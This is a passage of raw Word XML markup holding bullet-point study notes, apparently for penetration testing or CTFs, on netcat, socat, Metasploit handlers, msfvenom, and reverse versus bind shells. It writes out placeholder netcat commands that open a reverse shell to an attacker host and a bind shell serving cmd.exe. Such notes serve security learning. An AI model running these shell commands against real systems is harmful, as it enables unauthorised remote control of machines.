        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Swiss army knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080A7D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Manually perform network interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3C1F7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Banner grabbing during enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5524F8EC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Receive reverse shells and connect to remote ports attached to bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E478F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shells are unstable by default but can be improved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBBF9E9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F4BFD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Similar to netcat but stronger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC31BC7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Default shells are more stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D664E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>However</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A7CF9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax is more difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653956F7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Very rarely installed by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA2682" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit – multi/handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D342ED4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The auxiliary/multi/handler module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F5608B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Allows obtainment of stable shells and further options available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2185930F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Only way to interact with meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6762C5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Handle staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544DB82" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA5F00D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>used to generate payloads on the fly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F71D27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>commonly used to generate reverse and bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602659E0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Payload All The Things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52D81E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pentest Monkey Reverse Shell Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739C666" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>/usr/share/webshells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D062E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SecLists repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62E55B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Types of Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605BB50" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFAB13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>target is forced to execute code that connects back to attacker computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982EEE4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>tools mentioned above can be used to set up listeners to receive connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F136564" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>helpful for bypassing firewall rules that usually prevent attackers from connecting to arbitrary ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46256885" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>need to configure network to connect to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427A330" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC3F5B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>code executed on the target is used to start a listener attached to a shell directly on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E075483" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>then opened to internet, meaning you can connect to the port that the code has opened and obtain RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41DFE2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>does not require network configuration but may be prevented by firewalls protecting the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36C713" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>reverse shells are easier to execute and debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C802C45" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>most common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F4362" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>especially for CTFs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38EB27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on attacker - sudo nc -lvnp &lt;port #&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA22E3B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on target – nc &lt;local-ip&gt; &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4590A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>listening on our own attacking machine and send a connection from the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536892AC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bind Shell example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCFB99B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on the target – nc -lvnp &lt;port&gt; -e “cmd.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55106971" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on the attacker – nc &lt;machine ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A9F0E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>listening on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B1054" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Interactivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE34AB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>shells can either be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173748E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4BC61" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allow user to interact with programs after executing them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBB5BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>interactive programs require interactive shells</w:t>
      </w:r>
    </w:p>
